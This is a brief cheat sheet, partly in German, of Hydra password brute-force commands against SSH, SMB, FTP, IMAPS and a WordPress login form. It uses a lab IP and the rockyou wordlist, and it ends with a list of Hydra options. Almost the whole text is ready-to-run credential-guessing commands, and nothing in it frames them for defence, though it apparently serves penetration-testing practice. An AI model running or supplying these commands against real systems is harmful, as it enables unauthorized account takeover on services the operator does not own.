hydra

ssh

• hydra -l xinux -P bad-passwords 10.0.10.104 ssh

smb

• hydra -l xinux -P bad-passwords 10.0.10.104 smb

ftp

• hydra -l xinux -P bad-passwords 10.0.10.104 ftp

imaps

• hydra -S -v -l xinux -P bad-passwords -s 993 -f 10.0.10.104 imap -V

Wordpress ungetestet

• hydra -l [username] -P /usr/share/wordlists/rockyou.txt [host] http-post-form "/wp-admin/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:S=http%3A%2F%2F[host]%2Fwp-admin%2F" -V

Optionen

• -l -> Specify a username to use during brute force attack
• -L -> Specify a wordlist of usernames to be used during the bruteforce attack
• -p -> Specify a password to use during brute force attack
• -P -> Specify a wordlist of passwords to be used during the bruteforce attack
• -t -> Threads per Scan - Default 16
• -S connect via SSL